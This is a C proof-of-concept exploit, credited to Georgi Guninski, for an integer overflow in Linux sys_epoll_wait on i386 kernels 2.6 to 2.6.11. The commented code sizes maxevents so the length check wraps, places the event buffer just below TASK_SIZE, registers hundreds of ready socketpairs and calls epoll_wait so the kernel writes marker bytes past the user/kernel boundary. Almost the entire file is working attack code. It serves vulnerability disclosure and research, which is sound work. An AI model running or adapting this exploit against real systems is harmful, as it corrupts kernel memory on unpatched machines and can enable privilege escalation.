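/*
 * PoC: partial overwrite of low kernel memory through sys_epoll_wait().
 *
 * From:    Georgi Guninski (guninski at guninski.com)
 * Subject: overwriting low kernel memory
 *
 * It is possible to partially overwrite low kernel memory (Linux >= 2.6,
 * <= 2.6.11) due to an integer overflow in sys_epoll_wait and misuse of
 * __put_user in ep_send_events.  Tested on i386.  Despite the overflow,
 * the OS seemingly continues normal operation.
 *
 * Fix: http://linux.bkbits.net:8080/linux-2.6/cset@...dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d
 *
 * Copyright Georgi Guninski.
 * Cannot be used in vulnerabilities databases like securityfocus and mitre.
 *
 * How the program drives the bug (read off the arithmetic below; the
 * kernel-side description is the author's, confirm against 2.6.11 source):
 *
 *  - maxevents ("over") is the smallest count whose product with
 *    sizeof(struct epoll_event) exceeds 32 bits.  On i386 the kernel
 *    multiplies int * size_t in 32-bit unsigned arithmetic, so the length
 *    it checks in sys_epoll_wait is the wrapped value (8 bytes for a
 *    12-byte struct), not the real one.
 *  - The user buffer is placed so that [buf, buf + wrapped_len) ends just
 *    below TASK_SIZE.  That range is entirely in user space and passes the
 *    check, but the kernel then delivers up to MAXV ready events from that
 *    address with __put_user, walking past TASK_SIZE into kernel memory.
 *  - Every event record is filled with 0x42 marker bytes so the clobbered
 *    kernel memory can be recognized afterwards ("check what is after
 *    TASK_SIZE").
 *
 * Build (i386, 32-bit): cc -o epoll_poc epoll_poc.c [-DTASK_SIZE=0xc0000000]
 * Running this against a vulnerable kernel corrupts kernel memory; do it on
 * a disposable machine.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <limits.h>
#include <string.h>
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * TASK_SIZE is the user/kernel boundary of the *target* kernel.  The
 * original pulled it from the kernel tree by pretending to be kernel code;
 * keep that as the default, but allow -DTASK_SIZE=... so the PoC can be
 * built without matching kernel headers (the default i386 3G/1G split is
 * 0xc0000000 -- confirm against the target's config).
 */
#ifndef TASK_SIZE
#define __KERNEL__
#include <asm/processor.h>
#undef __KERNEL__
#endif

/* Number of socketpairs registered == number of ready events the kernel
 * will write in one epoll_wait() call.  Needs ~2*MAXV free descriptors. */
#define MAXV 500

/* Byte pattern stored in each delivered event so the overwrite is visible. */
#define MARKER 0x42424242u

int main(int argc, char **argv)
{
	(void)argc;
	(void)argv;

	/*
	 * Mirror the kernel's i386 arithmetic explicitly in 32 bits instead
	 * of relying on the host's size_t width (the original did
	 * int * size_t, which only wraps on a 32-bit build).
	 */
	const uint32_t evsz = (uint32_t)sizeof(struct epoll_event);
	const int over = (int)(UINT_MAX / evsz + 1);
	const uint32_t wrapped_len = (uint32_t)over * evsz;

	/*
	 * [km, km + wrapped_len) ends 4 bytes below TASK_SIZE, so the range
	 * the kernel checks is all user space; the real writes of up to MAXV
	 * events continue past TASK_SIZE.
	 */
	struct epoll_event *km = (struct epoll_event *)(uintptr_t)
		((uintptr_t)TASK_SIZE - wrapped_len - 4);

	/* %zu for size_t: the original's %d was a format/type mismatch. */
	printf("sizeof=%zu %x %lx\n", sizeof(struct epoll_event),
	       (unsigned)over, (unsigned long)(uintptr_t)km);

	int epfd = epoll_create(MAXV);
	printf("Epoll descriptor %i\n", epfd);
	if (epfd < 0) {
		perror("epoll_create");
		return 1;
	}

	int *fds = calloc(2 * MAXV, sizeof *fds);
	if (fds == NULL) {
		perror("calloc");
		close(epfd);
		return 1;
	}

	/*
	 * Create MAXV socketpairs and register the read end of each.  Stop
	 * at the first failure: the original kept going, and because the
	 * array is zero-filled it would then register fd 0 (stdin) instead.
	 */
	int npairs = 0;
	for (int i = 0; i < MAXV; i++) {
		if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2 * i])) {
			perror("pair");
			break;
		}

		struct epoll_event ev;
		/* Zero first: data is an 8-byte union and the original only
		 * set its low 32 bits, leaking stack garbage into the rest. */
		memset(&ev, 0, sizeof ev);
		ev.data.u32 = MARKER;
		/* The extra bits in events are kept from the original --
		 * presumably so the events word carries the marker too. */
		ev.events = EPOLLOUT | EPOLLIN | MARKER;

		if (epoll_ctl(epfd, EPOLL_CTL_ADD, fds[2 * i], &ev) < 0) {
			perror("epoll_ctl");
			break;
		}
		npairs++;
	}

	/* Make every registered fd readable so all npairs events are ready. */
	for (int i = 0; i < npairs; i++) {
		if (write(fds[2 * i + 1], &i, sizeof i) != (ssize_t)sizeof i)
			perror("write");
	}

	/* Flush dirty pages before corrupting kernel memory; sync(2) instead
	 * of system("sync") so no shell is spawned via PATH. */
	sync();

	/* The single call that triggers the overwrite. */
	int res = epoll_wait(epfd, km, over, -1);
	printf("epoll_wait returned %i\n", res);
	if (res < 0) {
		/* A kernel that rejects this maxevents (e.g. EINVAL) is
		 * most likely patched. */
		perror("epoll_wait");
	}
	printf("check what is after TASK_SIZE\n");

	/* The socketpair descriptors are released at process exit. */
	close(epfd);
	free(fds);
	return 42;
}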